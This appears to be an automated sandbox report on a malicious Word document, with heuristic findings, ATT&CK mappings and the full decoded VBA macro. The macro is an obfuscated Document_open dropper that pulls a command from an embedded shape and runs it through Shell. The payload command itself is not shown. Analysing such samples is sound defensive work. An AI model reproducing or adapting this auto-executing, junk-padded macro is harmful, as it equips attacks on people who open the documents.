MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro that executes a command-line payload. This payload attempts to download and execute a second-stage payload from a list of obfuscated URLs, including 'the embedded link'. The use of Shell() and cmd.exe invocation indicates a downloader functionality. The ClamAV detection further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Malware.Dkah-6765041-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dkah-6765041-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
WCWnjVrwm = CByte(174538838) izvKr = Array(ROzjt, Interaction.Shell(KuZABNGok, RlljuC), ARTwPT) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7606 bytes |
SHA-256: 13e8a4b37d74d9cbb4f9f24a014a446064bacf7f94a745cad4b52a25d2ef6766 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
174 of 249 identifiers look randomly generated (e.g. 'VLrJRWKFh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LoBBrDLCD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
EKXwn = Atn(kTwOafPUL)
fbrnLohJb = CLng(SuNUQE)
tswpOtwpi = Cos(CnZVMz)
iibTsPdNX = CByte(WpGczWh)
cMIQhtz = CByte(215520608)
fWCrGwT = CBool(251471321)
ddAdVbrU = AXmEQrz
llRAhVLo = 329622686
ViQtnpOtE = CByte(138247519)
On Error Resume Next
tSzHU = Atn(wQwkX)
UHYbdM = CLng(CpOTPRz)
ikiZBzj = Cos(pATjALlf)
TSRVpsIwr = CByte(NfwhpViUj)
KWTnTj = CByte(177534836)
cirEj = CBool(133284092)
zhGorVaJB = IrSiOV
FLozzdCGR = 333768102
MEJvilq = CByte(263330494)
On Error Resume Next
DbGqYrkiX = Atn(kQdctf)
mnzzMvQY = CLng(bIYqwbbI)
MJhiJmCm = Cos(JRbtnSM)
WTzrjpSsQ = CByte(KhOIpVn)
WCHdNwZR = CByte(47579985)
DiVGd = CBool(32227878)
HLzjT = ltKsFP
cGFFw = 66664131
sGAROiKo = CByte(222244731)
Set DJDhK = Shapes("siqTvuBXEodiw")
On Error Resume Next
jYqLSMtBI = Atn(jCiIzd)
qrJtzfqjD = CLng(cLwXD)
lIzGLiwcD = Cos(dFjHYftL)
rEBlt = CByte(bPLQq)
ujJsAB = CByte(147679582)
HsjpQCkD = CBool(311513920)
zSlWMok = EGkSnMN
iZWOXdX = 186156756
wYLVrQXTi = CByte(128566441)
On Error Resume Next
FrMuoNKYJ = Atn(BmbYRfPF)
sdiwirV = CLng(UaDVhHhY)
OJKsjpqNq = Cos(qrqVA)
OzRbtdC = CByte(ZpzGRU)
tzTQFujI = CByte(267824447)
ksnfwdFC = CBool(297336413)
JQzFlG = SurjwWYzr
Fuhhpcn = 59193266
PndLsEYA = CByte(146374863)
On Error Resume Next
FrujqqfzK = Atn(SjZYzQRv)
jBNLQ = CLng(CEwPhFHXF)
MtSPH = Cos(zFVanq)
DfjRTwqs = CByte(imolhkci)
LTRnWw = CByte(208414622)
TEHpq = CBool(65979260)
VukAoo = POfPjbV
NcqPbXSQ = 54350828
lSdmkqnc = CByte(189474446)
On Error Resume Next
jVPBFZEr = Atn(NOCprSfHz)
fzYPALO = CLng(zaMjSt)
abkqz = Cos(dHjKHA)
wqtnhuu = CByte(LFPprKHR)
jvIiQrvR = CByte(333205937)
BpoFs = CBool(74014075)
QGjYwYzY = VUAHFW
AdMsvhzzW = 229353378
stXzWiHu = CByte(2590909)
KuZABNGok = DJDhK.TextFrame.ContainingRange
On Error Resume Next
inVDLsZ = Atn(NDrhAc)
itHXqn = CLng(NRtarJ)
inpIANbs = Cos(qupptn)
FkiXLivUd = CByte(QaDJlBPd)
QBZzOqp = CByte(167433360)
dBwUaW = CBool(265018981)
IlbErUiPw = pKFsZ
OWtjkT = 218489577
EirbmvA = CByte(219247783)
On Error Resume Next
tEkZX = Atn(qncAc)
wFFkbk = CLng(mpzalBI)
jZKno = Cos(XUMocpkV)
csNcNz = CByte(WSvjqPudw)
OzJNSMo = CByte(248413549)
ltvzvpQ = CBool(201076446)
iYYvFkD = sHoIaipFa
LzKfYroO = 18397443
TzrakXv = CByte(172583057)
On Error Resume Next
zAqwE = Atn(rDZvZN)
rGQos = CLng(CljbQGQ)
EnNjKsX = Cos(dKEDb)
wWOOkJ = CByte(tkCcPRVTY)
poqmQLM = CByte(102207609)
fodGkp = CBool(336337482)
oJMBWGcK = KGvbC
ElOOkfjK = 18688265
PdFQiSnPh = CByte(213086486)
On Error Resume Next
ftLLXXPps = Atn(JBzERIA)
nksRNjcMi = CLng(iNCEpw)
idivj = Cos(CLMwju)
XinqjrDO = CByte(iiLtEGia)
MCzni = CByte(116936845)
EUpFA = CBool(238952664)
RtnzZLVwt = zwzkpLvjl
UrnjEVniW = 88198126
juntz = CByte(107934283)
On Error Resume Next
KzMBdXKDU = Atn(FrhpJl)
zHihGats = CLng(pqLXk)
WDNuGdQ = Cos(QotibfVdz)
qXsWKE = CByte(TJdiTrz)
dUicOfK = CByte(233663066)
OsMrS = CBool(84838042)
MqAjNjz = JXnUmPwzw
zKrBk = 215089943
niHRrfAw = CByte(332082509)
Const RlljuC = 0
On Error Resume Next
UAlMzQz = Atn(IQtTqEPT)
PjFRXYQfB = CLng(EAWZvoI)
YpSfcRa = Cos(kzEjUwHQ)
JQEwbUh = CByte(lsjlrwiid)
ickHoqknT = CByte(174003318)
KGtGBl = CBool(156581432)
dwUli = ZqAtzaAqH
nnBcNMo = 11729426
ibmqf = CByte(276113198)
On Error Resume Next
HjzTUrCct = Atn(TzBtJnp)
zVzzJZ = CLng(tdIIjc)
ajqiPFwo = Cos(YzCXBWQwf)
cATqHZXF = CByte(OtUMwoW)
CfYjOI = CByte(202196199)
zGCMWNM = CBool(192758854)
zfHsjErzV = zEnFjiE
QHzOro = 102921237
TVtEA = CByte(218540781)
On Error Resume Next
BLTsML = Atn(rtmiU)
bFbYNEz = CLng(mVsYKXADa)
MAADAX = Cos(idafNTDOV)
wtrAOlYPq = CByte(UCoBoSZ)
TYXEEa = CByte(200268045)
XMYCoKo = CBool(176219411)
JjMzO = oJwdjpZ
utluwYtpR = 146681683
OMqomKNN = CByte(339863587)
On Error Resume Next
VLrJRWKFh = Atn(ZwciJYIT)
marMInz = CLng(IjZmpc)
zQhDtJG = Cos(SEZlstrs)
sCwTdzjW = CByte(ECWIwj)
DhsqEZ = CByte(124657458)
rZHjBFYQ = CBool(278784404)
umfFURwha = DNKGq
oMzCcS = 237244998
cErAUN = CByte(211202394)
On Error Resume Next
mzlUKL = Atn(zvspKdc)
RImrs = CLng(mGFvpP)
LjfTTvd = Cos(itPzERk)
APktD = CByte(lJaJsAtf)
UvsmLNV = CByte(284905535)
wjnOWuoA = CBool(11255060)
EfFWZ = wVsJDdh
UvBLfYniY = 15638061
WCWnjVrwm = CByte(174538838)
izvKr = Array(ROzjt, Interaction.Shell(KuZABNGok, RlljuC), ARTwPT)
On Error Resume Next
nOhftP = Atn(lwsos)
ioLQtMrvs = CLng(XDBoHrWw)
IihGvRS = Cos(HzvjV)
vkDzS = CByte(DBQui)
craBt = CByte(182548384)
QkTwiQzaJ = CBool(239722811)
zACwGEDsE = UGOnbmpbd
FTmEW = 183510141
VjTauRTw = CByte(200440172)
On Error Resume Next
vdmwYczj = Atn(pNkXrHz)
KbJHhIY = CLng(ioimOOE)
aRiAi = Cos(zdiMtaGp)
ucaDO = CByte(YNUNVpn)
uNbJjz = CByte(169605975)
wuXcjdU = CBool(101518886)
UtjoJnKpd = EJnIz
NjzRQX = 293338362
Rifjlqvt = CByte(34908834)
On Error Resume Next
zQzJz = Atn(tHUYCX)
hDvzF = CLng(TnPTo)
PnfXJh = Cos(wwkjDuZMN)
jOEmwqD = CByte(HfrFN)
zJwhfOkK = CByte(277852559)
aLwXs = CBool(35773519)
uFRjEjYT = bRCCDrjCj
vrjzlYYzM = 246355433
jNCzzAvBs = CByte(167338534)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.